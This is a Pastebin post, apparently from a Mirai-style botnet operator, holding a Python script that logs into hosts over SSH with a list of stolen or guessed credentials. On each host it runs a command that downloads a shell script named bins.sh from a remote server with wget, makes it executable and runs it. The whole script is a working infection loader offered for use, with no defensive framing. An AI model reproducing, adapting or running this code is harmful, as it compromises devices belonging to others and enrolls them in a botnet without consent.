miraip0ts

Wget-vulnList

May 3rd, 2017
1,546
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.98 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Suck ma Ass?
  3.  
  4. import sys, re, os, paramiko
  5. from multiprocessing import Process
  6.  
  7. if len(sys.argv) < 2:
  8.     sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
  9.  
  10. paramiko.util.log_to_file("/dev/null")
  11. cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; sh bins.sh" #command to send
  12. r34d = open(str(sys.argv[1]),'a+')
  13. print "\033[31mStarting Scan!\n"
  14. def w0rk(username,password,ip):
  15.     try:
  16.         port = 22
  17.         ssh = paramiko.SSHClient()
  18.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  19.         ssh.connect(ip, port = port, username=username, password=password, timeout=3)
  20.         print "\033[32m[\033[31m+\033[32m] Command Sent: "+ip+"\033[37m\n"
  21.         ssh.exec_command(""+cmd+"")
  22.         ssh.close()
  23.     except:
  24.         pass
  25. for line in r34d:
  26.  ip_1nfo = line.split(":")
  27.  g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],))
  28.  g0d.start()
  29.  username=ip_1nfo[0]
  30.  password=ip_1nfo[1]
  31.  ip=ip_1nfo[2]
  32. g0d.join()
Add Comment
Please, Sign In to add comment